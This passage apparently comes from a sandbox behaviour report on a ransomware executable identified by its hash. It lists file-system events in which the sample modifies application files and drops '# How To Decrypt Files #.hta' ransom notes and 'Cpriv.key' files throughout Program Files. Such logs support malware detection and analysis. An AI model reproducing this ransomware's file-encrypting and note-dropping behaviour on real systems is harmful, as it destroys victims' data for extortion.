Assemblies\Microsoft\Framework\v3.0\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\cy.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\gu.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02091_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0299125.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15059_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\32.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.policy de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImage.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-api-caching.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00350_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\fonts\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft.NET\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\EDGE\EDGE.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Eurosti.TTF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0157177.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00476_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR47B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\MessageAttachmentIconImages.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Stars.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_over.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00057_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)notConnectedStateIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01295_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18244_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\FLASH.NET.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\uk-UA\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\JAVA_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\ADDINS\FAXEXT.ECF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Aspect.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00090_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Apothecary.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\CONCRETE\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\FREN\WT61FR.LEX de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-modules-appui.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\db\bin\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0238927.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Composite.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0158007.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\APPTL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\WinFXList.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\CANYON\CANYON.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\js\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02223U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\ECLIPSE\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\BIN\1033\FPEXT.MSG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\ant-javafx.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\MEDIA\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Extensions\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\sound.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\02_frenchtv.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\README.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\ONENOTE\14\Notebook Templates\Notebook03.onepkg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01184_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTO\ActionsPane3.xsd de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\CANYON\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\WATERMAR\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Esl\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\css\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152894.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\ADDINS\MSOSEC.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\SystemV\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0228823.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Internet Explorer\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Heart_VideoInset.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0297229.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03453_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115863.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\MP00646_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Office Word 2003 Look.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_bottom_right.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099145.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIcon.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\Antarctica\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\WINWORD.DEV_COL.HXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Filters\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.expressions_3.4.600.v20140128-0851.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099169.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsVersion1Warning.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\notConnectedStateIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.SF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SWEST_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MEDIA\ARROW.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\19.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\SONORA\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\attention.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198712.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Oasis\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\hint_up.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\ado\msado26.tlb de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR5B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad\osknumpadbase.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02161_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-ui.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\jce.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD08758_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02957_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\mainscroll.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_dot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\icon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01243_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107132.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR39F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Traditional.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Country.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\services_discovery\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\init.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationLeft_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\glass.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\27.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02040U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Concourse.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Flow.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\WebToolIconImages.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\default_apps\youtube.crx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\play_hov.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7\1033\VBLR6.CHM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jawt_md.h de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Stationery\1033\SEAMARBL.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\epl-v10.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0302827.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkDrop32x32.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105396.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\MSEnv\Cpriv.key 